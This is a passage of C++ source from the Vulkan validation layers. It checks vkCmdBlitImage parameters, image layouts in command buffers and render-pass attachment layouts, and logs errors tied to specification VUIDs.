ValidateImageSampleCount(src_image_state, VK_SAMPLE_COUNT_1_BIT, "vkCmdBlitImage(): srcImage", "VUID-vkCmdBlitImage-srcImage-00233"); skip |= ValidateImageSampleCount(dst_image_state, VK_SAMPLE_COUNT_1_BIT, "vkCmdBlitImage(): dstImage", "VUID-vkCmdBlitImage-dstImage-00234"); skip |= ValidateMemoryIsBoundToImage(src_image_state, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-srcImage-00220"); skip |= ValidateMemoryIsBoundToImage(dst_image_state, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-dstImage-00225"); skip |= ValidateImageUsageFlags(src_image_state, VK_IMAGE_USAGE_TRANSFER_SRC_BIT, true, 
"VUID-vkCmdBlitImage-srcImage-00219", "vkCmdBlitImage()", "VK_IMAGE_USAGE_TRANSFER_SRC_BIT"); skip |= ValidateImageUsageFlags(dst_image_state, VK_IMAGE_USAGE_TRANSFER_DST_BIT, true, "VUID-vkCmdBlitImage-dstImage-00224", "vkCmdBlitImage()", "VK_IMAGE_USAGE_TRANSFER_DST_BIT"); skip |= ValidateCmdQueueFlags(cb_node, "vkCmdBlitImage()", VK_QUEUE_GRAPHICS_BIT, "VUID-vkCmdBlitImage-commandBuffer-cmdpool"); skip |= ValidateCmd(cb_node, CMD_BLITIMAGE, "vkCmdBlitImage()"); skip |= InsideRenderPass(cb_node, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-renderpass"); skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_BLIT_SRC_BIT, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-srcImage-01999", "VUID-vkCmdBlitImage-srcImage-01999"); skip |= ValidateImageFormatFeatureFlags(dst_image_state, VK_FORMAT_FEATURE_BLIT_DST_BIT, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-dstImage-02000", "VUID-vkCmdBlitImage-dstImage-02000"); // TODO: Need to validate image layouts, which will include layout validation for shared presentable images VkFormat src_format = src_image_state->createInfo.format; VkFormat dst_format = dst_image_state->createInfo.format; VkImageType src_type = src_image_state->createInfo.imageType; VkImageType dst_type = dst_image_state->createInfo.imageType; if (VK_FILTER_LINEAR == filter) { skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_SAMPLED_IMAGE_FILTER_LINEAR_BIT, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-filter-02001", "VUID-vkCmdBlitImage-filter-02001"); } else if (VK_FILTER_CUBIC_IMG == filter) { skip |= ValidateImageFormatFeatureFlags(src_image_state, VK_FORMAT_FEATURE_SAMPLED_IMAGE_FILTER_CUBIC_BIT_IMG, "vkCmdBlitImage()", "VUID-vkCmdBlitImage-filter-02002", "VUID-vkCmdBlitImage-filter-02002"); } if ((VK_FILTER_CUBIC_IMG == filter) && (VK_IMAGE_TYPE_3D != src_type)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), 
"VUID-vkCmdBlitImage-filter-00237", "vkCmdBlitImage(): source image type must be VK_IMAGE_TYPE_3D when cubic filtering is specified."); } if ((VK_SAMPLE_COUNT_1_BIT != src_image_state->createInfo.samples) || (VK_SAMPLE_COUNT_1_BIT != dst_image_state->createInfo.samples)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00228", "vkCmdBlitImage(): source or dest image has sample count other than VK_SAMPLE_COUNT_1_BIT."); } // Validate consistency for unsigned formats if (FormatIsUInt(src_format) != FormatIsUInt(dst_format)) { std::stringstream ss; ss << "vkCmdBlitImage(): If one of srcImage and dstImage images has unsigned integer format, " << "the other one must also have unsigned integer format. " << "Source format is " << string_VkFormat(src_format) << " Destination format is " << string_VkFormat(dst_format); skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00230", "%s.", ss.str().c_str()); } // Validate consistency for signed formats if (FormatIsSInt(src_format) != FormatIsSInt(dst_format)) { std::stringstream ss; ss << "vkCmdBlitImage(): If one of srcImage and dstImage images has signed integer format, " << "the other one must also have signed integer format. 
" << "Source format is " << string_VkFormat(src_format) << " Destination format is " << string_VkFormat(dst_format); skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00229", "%s.", ss.str().c_str()); } // Validate filter for Depth/Stencil formats if (FormatIsDepthOrStencil(src_format) && (filter != VK_FILTER_NEAREST)) { std::stringstream ss; ss << "vkCmdBlitImage(): If the format of srcImage is a depth, stencil, or depth stencil " << "then filter must be VK_FILTER_NEAREST."; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00232", "%s.", ss.str().c_str()); } // Validate aspect bits and formats for depth/stencil images if (FormatIsDepthOrStencil(src_format) || FormatIsDepthOrStencil(dst_format)) { if (src_format != dst_format) { std::stringstream ss; ss << "vkCmdBlitImage(): If one of srcImage and dstImage images has a format of depth, stencil or depth " << "stencil, the other one must have exactly the same format. " << "Source format is " << string_VkFormat(src_format) << " Destination format is " << string_VkFormat(dst_format); skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-srcImage-00231", "%s.", ss.str().c_str()); } } // Depth or Stencil // Do per-region checks const char *invalid_src_layout_vuid = (src_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? "VUID-vkCmdBlitImage-srcImageLayout-01398" : "VUID-vkCmdBlitImage-srcImageLayout-00222"; const char *invalid_dst_layout_vuid = (dst_image_state->shared_presentable && GetDeviceExtensions()->vk_khr_shared_presentable_image) ? 
"VUID-vkCmdBlitImage-dstImageLayout-01399" : "VUID-vkCmdBlitImage-dstImageLayout-00227"; for (uint32_t i = 0; i < regionCount; i++) { const VkImageBlit rgn = pRegions[i]; bool hit_error = false; skip |= VerifyImageLayout(cb_node, src_image_state, rgn.srcSubresource, srcImageLayout, VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL, "vkCmdBlitImage()", invalid_src_layout_vuid, "VUID-vkCmdBlitImage-srcImageLayout-00221", &hit_error); skip |= VerifyImageLayout(cb_node, dst_image_state, rgn.dstSubresource, dstImageLayout, VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL, "vkCmdBlitImage()", invalid_dst_layout_vuid, "VUID-vkCmdBlitImage-dstImageLayout-00226", &hit_error); skip |= ValidateImageSubresourceLayers(cb_node, &rgn.srcSubresource, "vkCmdBlitImage()", "srcSubresource", i); skip |= ValidateImageSubresourceLayers(cb_node, &rgn.dstSubresource, "vkCmdBlitImage()", "dstSubresource", i); skip |= ValidateImageMipLevel(cb_node, src_image_state, rgn.srcSubresource.mipLevel, i, "vkCmdBlitImage()", "srcSubresource", "VUID-vkCmdBlitImage-srcSubresource-01705"); skip |= ValidateImageMipLevel(cb_node, dst_image_state, rgn.dstSubresource.mipLevel, i, "vkCmdBlitImage()", "dstSubresource", "VUID-vkCmdBlitImage-dstSubresource-01706"); skip |= ValidateImageArrayLayerRange(cb_node, src_image_state, rgn.srcSubresource.baseArrayLayer, rgn.srcSubresource.layerCount, i, "vkCmdBlitImage()", "srcSubresource", "VUID-vkCmdBlitImage-srcSubresource-01707"); skip |= ValidateImageArrayLayerRange(cb_node, dst_image_state, rgn.dstSubresource.baseArrayLayer, rgn.dstSubresource.layerCount, i, "vkCmdBlitImage()", "dstSubresource", "VUID-vkCmdBlitImage-dstSubresource-01708"); // Warn for zero-sized regions if ((rgn.srcOffsets[0].x == rgn.srcOffsets[1].x) || (rgn.srcOffsets[0].y == rgn.srcOffsets[1].y) || (rgn.srcOffsets[0].z == rgn.srcOffsets[1].z)) { std::stringstream ss; ss << "vkCmdBlitImage(): pRegions[" << i << "].srcOffsets specify a zero-volume area."; skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, 
VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_InvalidExtents, "%s", ss.str().c_str()); } if ((rgn.dstOffsets[0].x == rgn.dstOffsets[1].x) || (rgn.dstOffsets[0].y == rgn.dstOffsets[1].y) || (rgn.dstOffsets[0].z == rgn.dstOffsets[1].z)) { std::stringstream ss; ss << "vkCmdBlitImage(): pRegions[" << i << "].dstOffsets specify a zero-volume area."; skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), kVUID_Core_DrawState_InvalidExtents, "%s", ss.str().c_str()); } // Check that src/dst layercounts match if (rgn.srcSubresource.layerCount != rgn.dstSubresource.layerCount) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-layerCount-00239", "vkCmdBlitImage(): layerCount in source and destination subresource of pRegions[%d] does not match.", i); } if (rgn.srcSubresource.aspectMask != rgn.dstSubresource.aspectMask) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-aspectMask-00238", "vkCmdBlitImage(): aspectMask members for pRegion[%d] do not match.", i); } if (!VerifyAspectsPresent(rgn.srcSubresource.aspectMask, src_format)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-aspectMask-00241", "vkCmdBlitImage(): region [%d] source aspectMask (0x%x) specifies aspects not present in source " "image format %s.", i, rgn.srcSubresource.aspectMask, string_VkFormat(src_format)); } if (!VerifyAspectsPresent(rgn.dstSubresource.aspectMask, dst_format)) { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, 
HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-aspectMask-00242", "vkCmdBlitImage(): region [%d] dest aspectMask (0x%x) specifies aspects not present in dest image format %s.", i, rgn.dstSubresource.aspectMask, string_VkFormat(dst_format)); } // Validate source image offsets VkExtent3D src_extent = GetImageSubresourceExtent(src_image_state, &(rgn.srcSubresource)); if (VK_IMAGE_TYPE_1D == src_type) { if ((0 != rgn.srcOffsets[0].y) || (1 != rgn.srcOffsets[1].y)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcImage-00245", "vkCmdBlitImage(): region [%d], source image of type VK_IMAGE_TYPE_1D with srcOffset[].y values " "of (%1d, %1d). These must be (0, 1).", i, rgn.srcOffsets[0].y, rgn.srcOffsets[1].y); } } if ((VK_IMAGE_TYPE_1D == src_type) || (VK_IMAGE_TYPE_2D == src_type)) { if ((0 != rgn.srcOffsets[0].z) || (1 != rgn.srcOffsets[1].z)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcImage-00247", "vkCmdBlitImage(): region [%d], source image of type VK_IMAGE_TYPE_1D or VK_IMAGE_TYPE_2D with " "srcOffset[].z values of (%1d, %1d). 
These must be (0, 1).", i, rgn.srcOffsets[0].z, rgn.srcOffsets[1].z); } } bool oob = false; if ((rgn.srcOffsets[0].x < 0) || (rgn.srcOffsets[0].x > static_cast<int32_t>(src_extent.width)) || (rgn.srcOffsets[1].x < 0) || (rgn.srcOffsets[1].x > static_cast<int32_t>(src_extent.width))) { oob = true; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcOffset-00243", "vkCmdBlitImage(): region [%d] srcOffset[].x values (%1d, %1d) exceed srcSubresource width extent (%1d).", i, rgn.srcOffsets[0].x, rgn.srcOffsets[1].x, src_extent.width); } if ((rgn.srcOffsets[0].y < 0) || (rgn.srcOffsets[0].y > static_cast<int32_t>(src_extent.height)) || (rgn.srcOffsets[1].y < 0) || (rgn.srcOffsets[1].y > static_cast<int32_t>(src_extent.height))) { oob = true; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcOffset-00244", "vkCmdBlitImage(): region [%d] srcOffset[].y values (%1d, %1d) exceed srcSubresource height extent (%1d).", i, rgn.srcOffsets[0].y, rgn.srcOffsets[1].y, src_extent.height); } if ((rgn.srcOffsets[0].z < 0) || (rgn.srcOffsets[0].z > static_cast<int32_t>(src_extent.depth)) || (rgn.srcOffsets[1].z < 0) || (rgn.srcOffsets[1].z > static_cast<int32_t>(src_extent.depth))) { oob = true; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcOffset-00246", "vkCmdBlitImage(): region [%d] srcOffset[].z values (%1d, %1d) exceed srcSubresource depth extent (%1d).", i, rgn.srcOffsets[0].z, rgn.srcOffsets[1].z, src_extent.depth); } if (oob) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-pRegions-00215", 
"vkCmdBlitImage(): region [%d] source image blit region exceeds image dimensions.", i); } // Validate dest image offsets VkExtent3D dst_extent = GetImageSubresourceExtent(dst_image_state, &(rgn.dstSubresource)); if (VK_IMAGE_TYPE_1D == dst_type) { if ((0 != rgn.dstOffsets[0].y) || (1 != rgn.dstOffsets[1].y)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstImage-00250", "vkCmdBlitImage(): region [%d], dest image of type VK_IMAGE_TYPE_1D with dstOffset[].y values of " "(%1d, %1d). These must be (0, 1).", i, rgn.dstOffsets[0].y, rgn.dstOffsets[1].y); } } if ((VK_IMAGE_TYPE_1D == dst_type) || (VK_IMAGE_TYPE_2D == dst_type)) { if ((0 != rgn.dstOffsets[0].z) || (1 != rgn.dstOffsets[1].z)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstImage-00252", "vkCmdBlitImage(): region [%d], dest image of type VK_IMAGE_TYPE_1D or VK_IMAGE_TYPE_2D with " "dstOffset[].z values of (%1d, %1d). 
These must be (0, 1).", i, rgn.dstOffsets[0].z, rgn.dstOffsets[1].z);
                }
            }

            // Check that dstOffsets stay within the destination subresource extent; any out-of-bounds
            // coordinate also triggers the summary "region exceeds image dimensions" error below.
            oob = false;
            if ((rgn.dstOffsets[0].x < 0) || (rgn.dstOffsets[0].x > static_cast<int32_t>(dst_extent.width)) ||
                (rgn.dstOffsets[1].x < 0) || (rgn.dstOffsets[1].x > static_cast<int32_t>(dst_extent.width))) {
                oob = true;
                skip |= log_msg(
                    report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                    HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstOffset-00248",
                    "vkCmdBlitImage(): region [%d] dstOffset[].x values (%1d, %1d) exceed dstSubresource width extent (%1d).", i,
                    rgn.dstOffsets[0].x, rgn.dstOffsets[1].x, dst_extent.width);
            }
            if ((rgn.dstOffsets[0].y < 0) || (rgn.dstOffsets[0].y > static_cast<int32_t>(dst_extent.height)) ||
                (rgn.dstOffsets[1].y < 0) || (rgn.dstOffsets[1].y > static_cast<int32_t>(dst_extent.height))) {
                oob = true;
                skip |= log_msg(
                    report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                    HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstOffset-00249",
                    "vkCmdBlitImage(): region [%d] dstOffset[].y values (%1d, %1d) exceed dstSubresource height extent (%1d).", i,
                    rgn.dstOffsets[0].y, rgn.dstOffsets[1].y, dst_extent.height);
            }
            if ((rgn.dstOffsets[0].z < 0) || (rgn.dstOffsets[0].z > static_cast<int32_t>(dst_extent.depth)) ||
                (rgn.dstOffsets[1].z < 0) || (rgn.dstOffsets[1].z > static_cast<int32_t>(dst_extent.depth))) {
                oob = true;
                skip |= log_msg(
                    report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                    HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstOffset-00251",
                    "vkCmdBlitImage(): region [%d] dstOffset[].z values (%1d, %1d) exceed dstSubresource depth extent (%1d).", i,
                    rgn.dstOffsets[0].z, rgn.dstOffsets[1].z, dst_extent.depth);
            }
            if (oob) {
                skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-pRegions-00216",
                                "vkCmdBlitImage(): region [%d] destination image blit region exceeds image dimensions.", i);
            }

            // 3D blits must address the single slice: baseArrayLayer 0 and layerCount 1 on both src and dst.
            if ((VK_IMAGE_TYPE_3D == src_type) || (VK_IMAGE_TYPE_3D == dst_type)) {
                if ((0 != rgn.srcSubresource.baseArrayLayer) || (1 != rgn.srcSubresource.layerCount) ||
                    (0 != rgn.dstSubresource.baseArrayLayer) || (1 != rgn.dstSubresource.layerCount)) {
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                    HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcImage-00240",
                                    "vkCmdBlitImage(): region [%d] blit to/from a 3D image type with a non-zero baseArrayLayer, or a "
                                    "layerCount other than 1.",
                                    i);
                }
            }
        }  // per-region checks
    } else {
        assert(0);
    }
    return skip;
}

// Record-side hook for vkCmdBlitImage: updates tracked image layouts for each blit region and binds
// both images to the command buffer's lifetime tracking. No validation is performed here.
void CoreChecks::PreCallRecordCmdBlitImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout,
                                           VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount,
                                           const VkImageBlit *pRegions, VkFilter filter) {
    auto cb_node = GetCBNode(commandBuffer);
    auto src_image_state = GetImageState(srcImage);
    auto dst_image_state = GetImageState(dstImage);

    // Make sure that all image slices are updated to correct layout
    for (uint32_t i = 0; i < regionCount; ++i) {
        SetImageLayout(cb_node, src_image_state, pRegions[i].srcSubresource, srcImageLayout);
        SetImageLayout(cb_node, dst_image_state, pRegions[i].dstSubresource, dstImageLayout);
    }
    // Update bindings between images and cmd buffer
    AddCommandBufferBindingImage(cb_node, src_image_state);
    AddCommandBufferBindingImage(cb_node, dst_image_state);
}

// This validates that the initial layout specified in the command buffer for the IMAGE is the same as the global IMAGE layout
bool CoreChecks::ValidateCmdBufImageLayouts(GLOBAL_CB_NODE *pCB,
                                            std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> const &globalImageLayoutMap,
                                            std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> &overlayLayoutMap) {
    bool skip = false;
    for (auto cb_image_data : pCB->imageLayoutMap) {
        VkImageLayout imageLayout;
        // Short-circuit order: layouts recorded earlier in this submit (overlay map) take precedence
        // over the global layout map.
        if (FindLayout(overlayLayoutMap, cb_image_data.first, imageLayout) ||
            FindLayout(globalImageLayoutMap, cb_image_data.first, imageLayout)) {
            if (cb_image_data.second.initialLayout == VK_IMAGE_LAYOUT_UNDEFINED) {
                // TODO: Set memory invalid which is in mem_tracker currently
            } else if (imageLayout != cb_image_data.second.initialLayout) {
                if (cb_image_data.first.hasSubresource) {
                    skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                                    HandleToUint64(pCB->commandBuffer), kVUID_Core_DrawState_InvalidImageLayout,
                                    "Submitted command buffer expects image %s (subresource: aspectMask 0x%X array layer %u, mip level "
                                    "%u) to be in layout %s--instead, image %s's current layout is %s.",
                                    report_data->FormatHandle(cb_image_data.first.image).c_str(),
                                    cb_image_data.first.subresource.aspectMask, cb_image_data.first.subresource.arrayLayer,
                                    cb_image_data.first.subresource.mipLevel, string_VkImageLayout(cb_image_data.second.initialLayout),
                                    report_data->FormatHandle(cb_image_data.first.image).c_str(), string_VkImageLayout(imageLayout));
                } else {
                    skip |= log_msg(
                        report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT,
                        HandleToUint64(pCB->commandBuffer), kVUID_Core_DrawState_InvalidImageLayout,
                        "Submitted command buffer expects image %s to be in layout %s--instead, image %s's current layout is %s.",
                        report_data->FormatHandle(cb_image_data.first.image).c_str(),
                        string_VkImageLayout(cb_image_data.second.initialLayout),
                        report_data->FormatHandle(cb_image_data.first.image).c_str(), string_VkImageLayout(imageLayout));
                }
            }
            // Record the command buffer's final layout so later command buffers in this submit see it.
            SetLayout(overlayLayoutMap, cb_image_data.first, cb_image_data.second.layout);
        }
    }
    return skip;
}

// Propagate every image layout recorded in this command buffer into the global layout map.
void CoreChecks::UpdateCmdBufImageLayouts(GLOBAL_CB_NODE *pCB) {
    for (auto cb_image_data : pCB->imageLayoutMap) {
        VkImageLayout imageLayout;
        FindGlobalLayout(cb_image_data.first, imageLayout);
        SetGlobalLayout(cb_image_data.first, cb_image_data.second.layout);
    }
}

//
ValidateLayoutVsAttachmentDescription is a general function where we can validate various state associated with the // VkAttachmentDescription structs that are used by the sub-passes of a renderpass. Initial check is to make sure that READ_ONLY // layout attachments don't have CLEAR as their loadOp. bool CoreChecks::ValidateLayoutVsAttachmentDescription(const debug_report_data *report_data, RenderPassCreateVersion rp_version, const VkImageLayout first_layout, const uint32_t attachment, const VkAttachmentDescription2KHR &attachment_description) { bool skip = false; const char *vuid; const bool use_rp2 = (rp_version == RENDER_PASS_VERSION_2); // Verify that initial loadOp on READ_ONLY attachments is not CLEAR if (attachment_description.loadOp == VK_ATTACHMENT_LOAD_OP_CLEAR) { if (use_rp2 && ((first_layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL) || (first_layout == VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL) || (first_layout == VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkRenderPassCreateInfo2KHR-pAttachments-02522", "Cannot clear attachment %d with invalid first layout %s.", attachment, string_VkImageLayout(first_layout)); } else if (!use_rp2 && ((first_layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL) || (first_layout == VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkRenderPassCreateInfo-pAttachments-00836", "Cannot clear attachment %d with invalid first layout %s.", attachment, string_VkImageLayout(first_layout)); } } if (attachment_description.loadOp == VK_ATTACHMENT_LOAD_OP_CLEAR) { if (first_layout == VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL) { vuid = use_rp2 ? 
kVUID_Core_DrawState_InvalidRenderpass : "VUID-VkRenderPassCreateInfo-pAttachments-01566"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Cannot clear attachment %d with invalid first layout %s.", attachment, string_VkImageLayout(first_layout)); } } if (attachment_description.stencilLoadOp == VK_ATTACHMENT_LOAD_OP_CLEAR) { if (first_layout == VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL) { vuid = use_rp2 ? kVUID_Core_DrawState_InvalidRenderpass : "VUID-VkRenderPassCreateInfo-pAttachments-01567"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Cannot clear attachment %d with invalid first layout %s.", attachment, string_VkImageLayout(first_layout)); } } return skip; } bool CoreChecks::ValidateLayouts(RenderPassCreateVersion rp_version, VkDevice device, const VkRenderPassCreateInfo2KHR *pCreateInfo) { bool skip = false; const char *vuid; const bool use_rp2 = (rp_version == RENDER_PASS_VERSION_2); const char *const function_name = use_rp2 ? "vkCreateRenderPass2KHR()" : "vkCreateRenderPass()"; for (uint32_t i = 0; i < pCreateInfo->attachmentCount; ++i) { VkFormat format = pCreateInfo->pAttachments[i].format; if (pCreateInfo->pAttachments[i].initialLayout == VK_IMAGE_LAYOUT_UNDEFINED) { if ((FormatIsColor(format) || FormatHasDepth(format)) && pCreateInfo->pAttachments[i].loadOp == VK_ATTACHMENT_LOAD_OP_LOAD) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidRenderpass, "Render pass has an attachment with loadOp == VK_ATTACHMENT_LOAD_OP_LOAD and initialLayout == " "VK_IMAGE_LAYOUT_UNDEFINED. This is probably not what you intended. 
Consider using " "VK_ATTACHMENT_LOAD_OP_DONT_CARE instead if the image truely is undefined at the start of the " "render pass."); } if (FormatHasStencil(format) && pCreateInfo->pAttachments[i].stencilLoadOp == VK_ATTACHMENT_LOAD_OP_LOAD) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidRenderpass, "Render pass has an attachment with stencilLoadOp == VK_ATTACHMENT_LOAD_OP_LOAD and initialLayout " "== VK_IMAGE_LAYOUT_UNDEFINED. This is probably not what you intended. Consider using " "VK_ATTACHMENT_LOAD_OP_DONT_CARE instead if the image truely is undefined at the start of the " "render pass."); } } } // Track when we're observing the first use of an attachment std::vector<bool> attach_first_use(pCreateInfo->attachmentCount, true); for (uint32_t i = 0; i < pCreateInfo->subpassCount; ++i) { const VkSubpassDescription2KHR &subpass = pCreateInfo->pSubpasses[i]; // Check input attachments first, so we can detect first-use-as-input for VU #00349 for (uint32_t j = 0; j < subpass.inputAttachmentCount; ++j) { auto attach_index = subpass.pInputAttachments[j].attachment; if (attach_index == VK_ATTACHMENT_UNUSED) continue; switch (subpass.pInputAttachments[j].layout) { case VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL: case VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL: // These are ideal. break; case VK_IMAGE_LAYOUT_GENERAL: // May not be optimal. TODO: reconsider this warning based on other constraints. skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for input attachment is GENERAL but should be READ_ONLY_OPTIMAL."); break; case VK_IMAGE_LAYOUT_UNDEFINED: case VK_IMAGE_LAYOUT_PREINITIALIZED: vuid = use_rp2 ? 
